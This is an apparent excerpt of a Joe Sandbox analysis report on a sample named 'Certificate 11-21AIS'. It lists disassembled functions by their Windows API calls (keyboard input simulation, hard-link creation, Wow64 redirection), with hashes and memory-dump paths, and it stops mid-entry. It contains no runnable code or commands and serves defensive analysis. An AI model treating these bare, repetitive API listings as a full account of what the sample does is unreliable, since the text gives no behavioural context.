                                                                              • Opcode ID: 4bb90ce31df30661c6b8bb6c3abab07789e448822e87caae8b8bb7588f48f199
                                                                              • Instruction ID: ec7c154e71d98a4482974bc02c3d06b500b7889bfc5072180b685991759cd2af
                                                                              • Opcode Fuzzy Hash: 4bb90ce31df30661c6b8bb6c3abab07789e448822e87caae8b8bb7588f48f199
                                                                              • Instruction Fuzzy Hash: 6AE0B67966E700ABDB615F61ED0DF053A6AB786B16F100454F109D22B0CBB89448EB14
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime__swprintf
                                                                              • String ID: %.3d$WIN_XPe
                                                                              • API String ID: 2070861257-2409531811
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008C42EC,?,008C42AA,?), ref: 008C4304
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4316
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-1355242751
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,009221FB,?,009223EF), ref: 00922213
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00922225
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetProcessId$kernel32.dll
                                                                              • API String ID: 2574300362-399901964
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,008C41BB,008C4341,?,008C422F,?,008C41BB,?,?,?,?,008C39FE,?,00000001), ref: 008C4359
                                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008C436B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                              • API String ID: 2574300362-3689287502
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,0090051D,?,009005FE), ref: 00900547
                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00900559
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                              • API String ID: 2574300362-1071820185
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0090052F,?,009006D7), ref: 00900572
                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00900584
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                              • API String ID: 2574300362-1587604923
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0091ECBE,?,0091EBBB), ref: 0091ECD6
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0091ECE8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0091BAD3,00000001,0091B6EE,?,0095DC00), ref: 0091BAEB
                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0091BAFD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                              • API String ID: 2574300362-199464113
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00923BD1,?,00923E06), ref: 00923BE9
                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00923BFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2574300362-4033151799
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 0091AAB4
                                                                              • CoUninitialize.OLE32 ref: 0091AABF
                                                                                • Part of subcall function 00900213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0090027B
                                                                              • VariantInit.OLEAUT32(?), ref: 0091AACA
                                                                              • VariantClear.OLEAUT32(?), ref: 0091AD9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              • Opcode ID: 38b7f4f11d937305f3cab140bdd7f680a7ee630bde5a88e08b22592d4a992276
                                                                              • Instruction ID: 2c2f6dd660dcd55363d7ae3fb78270cbf23f6bd783bc5c6c01d52c8f688c9866
                                                                              • Opcode Fuzzy Hash: 38b7f4f11d937305f3cab140bdd7f680a7ee630bde5a88e08b22592d4a992276
                                                                              • Instruction Fuzzy Hash: 9F519434A0430ADBDB24AF799891B3EB3A9FF55318F20981FE686C73D1DB7198808705
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3877424927-0
                                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                              • Instruction ID: 4ab0c7688f4596a6b1554de967a502b0343f56ccbbf1a1ed5249d1e13f374a46
                                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                              • Instruction Fuzzy Hash: AF5195B0A00289ABDB248F7B8C8856E77B5FF52324F248639F825D72E0D7719F509B41
                                                                              APIs
                                                                              • GetWindowRect.USER32(00FC6818,?), ref: 0092C544
                                                                              • ScreenToClient.USER32(?,00000002), ref: 0092C574
                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0092C5DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientMoveRectScreen
                                                                              • String ID:
                                                                              • API String ID: 3880355969-0
                                                                              • Opcode ID: 8e86c832f7b90865d78bb2f31ae0fb190e1c7c3d4f2a5cf14684b56033eb5dd1
                                                                              • Instruction ID: d8d12aa2fefe24782c80b6332ef4793b37314ab9e23c578817c2da3d1ad135e7
                                                                              • Opcode Fuzzy Hash: 8e86c832f7b90865d78bb2f31ae0fb190e1c7c3d4f2a5cf14684b56033eb5dd1
                                                                              • Instruction Fuzzy Hash: 96515DB5904219EFCF20DF68D880EAE7BBAFB55320F108659F9559B294D730ED81CB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 008FC462
                                                                              • __itow.LIBCMT ref: 008FC49C
                                                                                • Part of subcall function 008FC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 008FC753
                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 008FC505
                                                                              • __itow.LIBCMT ref: 008FC55A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 453128176ae1b2ec8548a5d45dd8403980594482d86bdea8b41150107f80da6c
                                                                              • Instruction ID: 1b3415291ca9ecabb153a478879594285755b24cbe2887114b648539446cd0f0
                                                                              • Opcode Fuzzy Hash: 453128176ae1b2ec8548a5d45dd8403980594482d86bdea8b41150107f80da6c
                                                                              • Instruction Fuzzy Hash: DB415C71A0020CABDF15EF68C955FBE7BB9FB59700F000019FA05E7181DB70AA458BA6
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00903966
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00903982
                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009039EF
                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00903A4D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: a1bcf50d72a05e8fcfeb966ffbc134819e0480ae65c7181a333ad4da2719bdc9
                                                                              • Instruction ID: 9014244bfba3a5068128fd06133e0425811b603d11d75b310218d2b0c34c0b66
                                                                              • Opcode Fuzzy Hash: a1bcf50d72a05e8fcfeb966ffbc134819e0480ae65c7181a333ad4da2719bdc9
                                                                              • Instruction Fuzzy Hash: 1A412670A44208EEEF208B65C809BFDBBBDAB95310F04811AF4D1922C1CBB88E85D761
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0090E742
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0090E768
                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0090E78D
                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0090E7B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 817178280210ee5c74518322334152b54173beb050941af6ca10b8f8070a2398
                                                                              • Instruction ID: 1cc1b257cf9ea5a16812f1cd80c1477d9bf504acd21f66a7b78c6b9bdfec4236
                                                                              • Opcode Fuzzy Hash: 817178280210ee5c74518322334152b54173beb050941af6ca10b8f8070a2398
                                                                              • Instruction Fuzzy Hash: 88411739600610DFCB11EF29C445A4DBBF5FF99720B098499E956AB3A2CB74FD40CB92
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0092B5D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: b13e6dcde1ef06edffb15afd8e72eeeb3bacb85af18eb74fcf85cfdcae3ae156
                                                                              • Instruction ID: 0c806e0f1ad0c02068725c4b5c1c1a4d7bb6866a1279f6e6783b09f4ea51f2dc
                                                                              • Opcode Fuzzy Hash: b13e6dcde1ef06edffb15afd8e72eeeb3bacb85af18eb74fcf85cfdcae3ae156
                                                                              • Instruction Fuzzy Hash: 1431D478611224BFEF309F18EC89FAC77E9EB06320F644501FA51DA2E9D734E9409B51
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 0092D807
                                                                              • GetWindowRect.USER32(?,?), ref: 0092D87D
                                                                              • PtInRect.USER32(?,?,0092ED5A), ref: 0092D88D
                                                                              • MessageBeep.USER32(00000000), ref: 0092D8FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: eaab53a82201e8501a6ea7a758b5eb6d8f5e3582652855e563fc1a17e325803d
                                                                              • Instruction ID: 5b21cc1892b5e5b5317e2fb66b47c590abca36c35137c610737a4471c686d2a2
                                                                              • Opcode Fuzzy Hash: eaab53a82201e8501a6ea7a758b5eb6d8f5e3582652855e563fc1a17e325803d
                                                                              • Instruction Fuzzy Hash: 8941BD78A06229DFCB11DF58E884FA97BF9FF49311F1881A9E4548B268D730E941DB40
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00903AB8
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00903AD4
                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00903B34
                                                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00903B92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: a6bb73f4407f1b34dd28677ee87e1dd9cc5d6e5b0abad8389c453be17641dda2
                                                                              • Instruction ID: 95696ae612d6fa0848ffce6ee25e6c0c93951cd81ccdf3cd15f6203270266e44
                                                                              • Opcode Fuzzy Hash: a6bb73f4407f1b34dd28677ee87e1dd9cc5d6e5b0abad8389c453be17641dda2
                                                                              • Instruction Fuzzy Hash: 82313830A44258AEEF308B64C819BFE7FBD9B56318F04815AF481A32D1C7788F45D761
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008F4038
                                                                              • __isleadbyte_l.LIBCMT ref: 008F4066
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F4094
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F40CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
